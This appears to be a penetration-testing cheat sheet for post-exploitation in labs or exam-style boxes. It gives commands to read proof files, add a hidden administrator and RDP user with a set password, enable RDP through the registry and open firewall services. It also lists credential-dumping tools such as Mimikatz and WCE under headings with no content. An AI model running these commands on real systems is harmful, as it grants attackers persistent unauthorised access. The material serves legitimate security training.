Post exploitation

Don't.stop.here.you.are.only.halfway.

Proof.txt

Linux

cat /root/proof.txt

Windows

type "C:\Documents and Settings\Administrator\Desktop\proof.txt"

Windows

Add RDP user

net user hodor Qwerty123! /add
net localgroup administrators hodor /add
net localgroup "Remote Desktop Users" hodor /add

Enable RDP

Via registry:

reg add "hklm\system\currentcontrolset\control\terminal server" /f /v fDenyTSConnections /t REG_DWORD /d 0

Add firewall rule:

netsh firewall set service remoteadmin enable
netsh firewall set service remotedesktop enable

Rdesktop resolution

Passwords and hashes

Mimikatz

Extract passwords, keys, pin codes, tickets from "lsass" memory:

Pass-the-hash

Elevate token

Dump SAM

Windows Credential Editor (WCE)

Security tool that can be used to extract cleartext passwords and NTLM hashes from a Windows host. Administrator privileges are required.

Networking

Is there a connection with another host?

Hosts file

Firewall config

PowerShell tools

Empire

PowerSploit

Linux

Spawn TTY shell

Last updated